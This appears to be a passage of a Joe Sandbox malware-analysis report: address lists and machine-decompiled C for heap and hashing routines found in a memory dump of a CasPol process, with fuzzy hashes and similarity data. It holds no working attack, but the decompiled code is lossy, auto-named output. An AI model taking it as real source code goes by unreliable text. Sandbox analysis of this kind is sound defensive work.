                                                                0x0162c689
                                                                0x0162c694
                                                                0x0162c694
                                                                0x0162c642
                                                                0x0162c64a
                                                                0x0162c697
                                                                0x01697a25
                                                                0x01697a2b
                                                                0x01697a2e
                                                                0x01697a30
                                                                0x01697bea
                                                                0x01697bea
                                                                0x00000000
                                                                0x01697bea
                                                                0x01697a36
                                                                0x01697a43
                                                                0x01697a48
                                                                0x01697a4c
                                                                0x01697a4e
                                                                0x00000000
                                                                0x00000000
                                                                0x01697a58
                                                                0x01697a5a
                                                                0x01697a5b
                                                                0x01697a5c
                                                                0x01697a5d
                                                                0x01697a63
                                                                0x01697a64
                                                                0x01697a6a
                                                                0x01697a6c
                                                                0x01697a6e
                                                                0x016979cb
                                                                0x016979cb
                                                                0x016979ce
                                                                0x016979d0
                                                                0x01697a98
                                                                0x01697a9b
                                                                0x01697a9b
                                                                0x01697a9e
                                                                0x01697aa1
                                                                0x01697bbe
                                                                0x01697bbe
                                                                0x01697bc0
                                                                0x01697be0
                                                                0x01697be0
                                                                0x01697a01
                                                                0x01697a01
                                                                0x01697a05
                                                                0x01697a07
                                                                0x01697a15
                                                                0x01697a15
                                                                0x01697a1a
                                                                0x00000000
                                                                0x01697a1a
                                                                0x01697bc2
                                                                0x01697bc6
                                                                0x01697bc9
                                                                0x01697bcd
                                                                0x01697bcf
                                                                0x016979e6
                                                                0x016979e6
                                                                0x016979eb
                                                                0x016979eb
                                                                0x016979ef
                                                                0x016979f1
                                                                0x00000000
                                                                0x00000000
                                                                0x016979f3
                                                                0x016979f5
                                                                0x016979ff
                                                                0x016979ff
                                                                0x00000000
                                                                0x016979ff
                                                                0x016979f7
                                                                0x016979fd
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016979fd
                                                                0x01697bd5
                                                                0x01697bd8
                                                                0x00000000
                                                                0x00000000
                                                                0x01697ba9
                                                                0x01697bac
                                                                0x01697bb0
                                                                0x01697bb1
                                                                0x01697bb1
                                                                0x01697bb6
                                                                0x00000000
                                                                0x01697bb6
                                                                0x01697aa7
                                                                0x01697aaa
                                                                0x00000000
                                                                0x00000000
                                                                0x01697ab2
                                                                0x01697ab3
                                                                0x01697ab5
                                                                0x01697aec
                                                                0x01697aef
                                                                0x01697b25
                                                                0x01697b28
                                                                0x01697b62
                                                                0x01697b64
                                                                0x01697b8f
                                                                0x01697b92
                                                                0x01697b96
                                                                0x01697b98
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b9e
                                                                0x01697b9f
                                                                0x01697ba3
                                                                0x00000000
                                                                0x01697ba3
                                                                0x01697b66
                                                                0x01697b68
                                                                0x01697ae2
                                                                0x01697ae2
                                                                0x00000000
                                                                0x01697ae2
                                                                0x01697b6e
                                                                0x01697b72
                                                                0x01697b75
                                                                0x01697b81
                                                                0x01697b85
                                                                0x01697b87
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b31
                                                                0x01697b34
                                                                0x01697b3c
                                                                0x01697b45
                                                                0x01697b46
                                                                0x01697b4f
                                                                0x01697b51
                                                                0x01697b57
                                                                0x01697b59
                                                                0x01697b59
                                                                0x00000000
                                                                0x01697b59
                                                                0x01697b77
                                                                0x00000000
                                                                0x01697b77
                                                                0x01697b2a
                                                                0x00000000
                                                                0x01697b2a
                                                                0x01697af1
                                                                0x01697af3
                                                                0x00000000
                                                                0x00000000
                                                                0x01697afb
                                                                0x01697afc
                                                                0x01697afe
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b00
                                                                0x01697b03
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b05
                                                                0x01697b09
                                                                0x01697b0d
                                                                0x01697b0f
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b18
                                                                0x01697b1d
                                                                0x00000000
                                                                0x01697b1d
                                                                0x01697ab7
                                                                0x01697ab9
                                                                0x00000000
                                                                0x00000000
                                                                0x01697abf
                                                                0x01697ac1
                                                                0x00000000
                                                                0x00000000
                                                                0x01697ac3
                                                                0x01697ac6
                                                                0x00000000
                                                                0x00000000
                                                                0x01697ac8
                                                                0x01697acc
                                                                0x01697ad0
                                                                0x01697ad2
                                                                0x00000000
                                                                0x00000000
                                                                0x01697adb
                                                                0x00000000
                                                                0x01697adb
                                                                0x016979d6
                                                                0x016979d9
                                                                0x016979dc
                                                                0x01697a91
                                                                0x01697a94
                                                                0x00000000
                                                                0x01697a94
                                                                0x016979e2
                                                                0x00000000
                                                                0x016979e2
                                                                0x01697a74
                                                                0x01697a7a
                                                                0x00000000
                                                                0x00000000
                                                                0x01697a8a
                                                                0x01697a21
                                                                0x01697a21
                                                                0x00000000
                                                                0x01697a21
                                                                0x0162c650
                                                                0x0162c651
                                                                0x0162c656
                                                                0x0162c65c
                                                                0x0162c65d
                                                                0x0162c663
                                                                0x0162c664
                                                                0x0162c66a
                                                                0x0162c66e
                                                                0x016979c5
                                                                0x016979c7
                                                                0x00000000
                                                                0x016979c7
                                                                0x0162c67a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                                                                • Instruction ID: aea53e7b683cbcfab525b1baa9e05b9e30bbd0a111c8c10ad0b602dc80fa92f4
                                                                • Opcode Fuzzy Hash: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                                                                • Instruction Fuzzy Hash: 88819D756242068BDF26CE58CC80A7AB7ADFF84250F14496EEE459B345D334ED41CFA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E03DA Relevance: .2, Instructions: 218COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 73%
                                                                			E016E03DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x171634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x1716348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E016EBBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E01642280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					E0163FFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						E016EBCD2(_t178,  *0x1716348,  *0x171634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E0165F3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E016E0150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E016E0180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}













































                                                                0x016e03e5
                                                                0x016e03eb
                                                                0x016e03ed
                                                                0x016e03ef
                                                                0x016e03f5
                                                                0x016e03f8
                                                                0x016e03fc
                                                                0x016e03ff
                                                                0x016e0404
                                                                0x016e0406
                                                                0x016e040b
                                                                0x016e0619
                                                                0x016e0619
                                                                0x016e0414
                                                                0x016e0417
                                                                0x016e041b
                                                                0x016e041e
                                                                0x016e0421
                                                                0x016e042c
                                                                0x016e0436
                                                                0x016e0438
                                                                0x016e043b
                                                                0x016e0440
                                                                0x016e0448
                                                                0x016e058e
                                                                0x016e0596
                                                                0x016e059b
                                                                0x016e05a0
                                                                0x016e05a3
                                                                0x016e05d1
                                                                0x016e05d6
                                                                0x016e05d9
                                                                0x016e05dc
                                                                0x016e05e2
                                                                0x016e05e4
                                                                0x016e05e7
                                                                0x016e05e9
                                                                0x016e05eb
                                                                0x016e05f1
                                                                0x016e05f4
                                                                0x016e05fb
                                                                0x016e060b
                                                                0x016e060b
                                                                0x00000000
                                                                0x016e0610
                                                                0x016e0450
                                                                0x016e0458
                                                                0x016e045f
                                                                0x00000000
                                                                0x00000000
                                                                0x016e0465
                                                                0x016e046b
                                                                0x016e046f
                                                                0x016e046f
                                                                0x016e0472
                                                                0x016e0478
                                                                0x016e047d
                                                                0x016e047f
                                                                0x016e0484
                                                                0x016e061c
                                                                0x016e0622
                                                                0x00000000
                                                                0x00000000
                                                                0x016e0628
                                                                0x016e062c
                                                                0x00000000
                                                                0x016e048a
                                                                0x016e048a
                                                                0x016e048a
                                                                0x016e048f
                                                                0x016e04a2
                                                                0x016e04a9
                                                                0x016e04ab
                                                                0x016e04ab
                                                                0x016e04ad
                                                                0x016e04b3
                                                                0x016e04b8
                                                                0x016e04bb
                                                                0x016e04c1
                                                                0x016e04c6
                                                                0x016e04ca
                                                                0x016e04cc
                                                                0x016e04dd
                                                                0x016e04e6
                                                                0x016e04e8
                                                                0x016e04f1
                                                                0x016e04f4
                                                                0x016e0568
                                                                0x016e056b
                                                                0x016e0571
                                                                0x016e0577
                                                                0x016e0579
                                                                0x016e057c
                                                                0x016e0581
                                                                0x016e0583
                                                                0x016e0586
                                                                0x016e058b
                                                                0x016e058b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e04f6
                                                                0x016e04f6
                                                                0x016e04f6
                                                                0x016e04f9
                                                                0x016e04fc
                                                                0x016e04fc
                                                                0x016e04ff
                                                                0x016e0505
                                                                0x00000000
                                                                0x00000000
                                                                0x016e0509
                                                                0x016e050f
                                                                0x016e0532
                                                                0x016e0542
                                                                0x016e0544
                                                                0x016e054a
                                                                0x016e054c
                                                                0x016e054f
                                                                0x016e0552
                                                                0x016e0552
                                                                0x016e0557
                                                                0x016e055a
                                                                0x016e055b
                                                                0x016e0564
                                                                0x00000000
                                                                0x016e04ce
                                                                0x016e04ce
                                                                0x016e04d0
                                                                0x016e04d3
                                                                0x016e04d3
                                                                0x016e04d4
                                                                0x016e04d6
                                                                0x016e04d9
                                                                0x00000000
                                                                0x016e04d3
                                                                0x016e04cc
                                                                0x016e0491
                                                                0x016e0496
                                                                0x016e049d
                                                                0x016e04a0
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e0498
                                                                0x016e0498
                                                                0x016e0498
                                                                0x016e0499
                                                                0x016e0499
                                                                0x00000000
                                                                0x016e0498

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 204dc679f701f5f5fdc76928913893391b3e7a1587c8220f08b3998e6e44fb22
                                                                • Instruction ID: 817afd06365e71a6a6f5705304eb99275ad49fe749e35266eda4d549ba703834
                                                                • Opcode Fuzzy Hash: 204dc679f701f5f5fdc76928913893391b3e7a1587c8220f08b3998e6e44fb22
                                                                • Instruction Fuzzy Hash: 4D71B272A01215DBDB18CF5CCD80B6DBBF6EB84310F298269E9159F385D770E941CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016ED616 Relevance: .2, Instructions: 216COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 60%
                                                                			E016ED616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x171d360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x171610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x160aef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x171610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E016EC70A(__ecx + 0x38, _t150);
				}
				_t79 = E016EC5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E016EA359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x171610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L0164FAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E01651710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x171b1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x1716110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x171610c & 0x00000002;
							_v16 = _t94;
							if(( *0x171610c & 0x00000002) == 0) {
								L25:
								_t95 = E016ED597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E016EDEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x171b1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x1716110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x1716110 ^ _t159;
										__eflags = _t164;
										 *0x171b1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E0164FA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E0166B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E016EA359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}






































                                                                0x016ed625
                                                                0x016ed629
                                                                0x016ed62d
                                                                0x016ed62f
                                                                0x016ed632
                                                                0x016ed638
                                                                0x016ed63f
                                                                0x016ed641
                                                                0x016ed64c
                                                                0x016ed64f
                                                                0x016ed660
                                                                0x016ed651
                                                                0x016ed659
                                                                0x016ed659
                                                                0x016ed667
                                                                0x016ed66e
                                                                0x016ed67c
                                                                0x016ed69a
                                                                0x016ed6a0
                                                                0x016ed6a5
                                                                0x016ed6a7
                                                                0x016ed6ad
                                                                0x016ed6b1
                                                                0x016ed6b2
                                                                0x016ed6b2
                                                                0x016ed6b8
                                                                0x016ed6c1
                                                                0x016ed6c4
                                                                0x016ed6fb
                                                                0x016ed6fd
                                                                0x016ed6fd
                                                                0x016ed6fe
                                                                0x016ed701
                                                                0x016ed703
                                                                0x016ed706
                                                                0x016ed70c
                                                                0x016ed70c
                                                                0x016ed717
                                                                0x016ed71a
                                                                0x016ed720
                                                                0x016ed72d
                                                                0x016ed722
                                                                0x016ed727
                                                                0x016ed729
                                                                0x016ed729
                                                                0x016ed731
                                                                0x016ed76a
                                                                0x016ed76a
                                                                0x00000000
                                                                0x016ed733
                                                                0x016ed749
                                                                0x016ed751
                                                                0x016ed755
                                                                0x016ed75e
                                                                0x016ed760
                                                                0x016ed76c
                                                                0x016ed76c
                                                                0x016ed773
                                                                0x016ed776
                                                                0x016ed786
                                                                0x016ed78c
                                                                0x016ed791
                                                                0x016ed793
                                                                0x016ed796
                                                                0x016ed796
                                                                0x016ed799
                                                                0x016ed79b
                                                                0x016ed79d
                                                                0x016ed7a1
                                                                0x016ed7a5
                                                                0x016ed7a5
                                                                0x016ed7a8
                                                                0x016ed7aa
                                                                0x016ed7aa
                                                                0x016ed7a1
                                                                0x016ed7ad
                                                                0x016ed7af
                                                                0x016ed7d8
                                                                0x016ed7d8
                                                                0x016ed7db
                                                                0x016ed7dd
                                                                0x016ed7e4
                                                                0x016ed7e4
                                                                0x016ed7e4
                                                                0x016ed7e6
                                                                0x016ed7e8
                                                                0x016ed7f0
                                                                0x016ed7f0
                                                                0x016ed7f4
                                                                0x016ed7f9
                                                                0x016ed7fd
                                                                0x016ed805
                                                                0x016ed810
                                                                0x016ed814
                                                                0x016ed816
                                                                0x016ed816
                                                                0x00000000
                                                                0x016ed7b1
                                                                0x016ed7c2
                                                                0x016ed7c8
                                                                0x016ed7ca
                                                                0x016ed7cc
                                                                0x016ed7d2
                                                                0x016ed7d5
                                                                0x00000000
                                                                0x016ed7d5
                                                                0x016ed7ce
                                                                0x016ed818
                                                                0x016ed818
                                                                0x016ed81b
                                                                0x016ed81d
                                                                0x016ed831
                                                                0x016ed831
                                                                0x016ed835
                                                                0x016ed83b
                                                                0x016ed83d
                                                                0x016ed83d
                                                                0x016ed840
                                                                0x016ed844
                                                                0x016ed84a
                                                                0x016ed84a
                                                                0x016ed861
                                                                0x016ed861
                                                                0x016ed7af
                                                                0x016ed778
                                                                0x016ed77c
                                                                0x00000000
                                                                0x00000000
                                                                0x016ed77e
                                                                0x016ed781
                                                                0x00000000
                                                                0x016ed781
                                                                0x016ed757
                                                                0x00000000
                                                                0x016ed757
                                                                0x016ed731
                                                                0x016ed6c6
                                                                0x016ed6d1
                                                                0x00000000
                                                                0x00000000
                                                                0x016ed6d6
                                                                0x016ed6db
                                                                0x016ed6dd
                                                                0x016ed6e3
                                                                0x016ed6e7
                                                                0x016ed6e8
                                                                0x016ed6e8
                                                                0x016ed6ed
                                                                0x016ed6f0
                                                                0x016ed6f4
                                                                0x016ed6f6
                                                                0x016ed6f6
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d094a5bdb694a3f754ce8dcb20290e2f4fbf695e19bad5402486aac71f549d2
                                                                • Instruction ID: 123d08c98f59bae8382ef941d6c1cdac5909b9ac3ae9650440d3fe9070a158ca
                                                                • Opcode Fuzzy Hash: 7d094a5bdb694a3f754ce8dcb20290e2f4fbf695e19bad5402486aac71f549d2
                                                                • Instruction Fuzzy Hash: 83818C71E0126A9BCF14DFA8DC846BEBBF5BF48210F158269E915E7381EB709911CF84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016DFA2B Relevance: .2, Instructions: 214COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 25%
                                                                			E016DFA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x1700e38);
				_t98 = E0167D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x1717bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
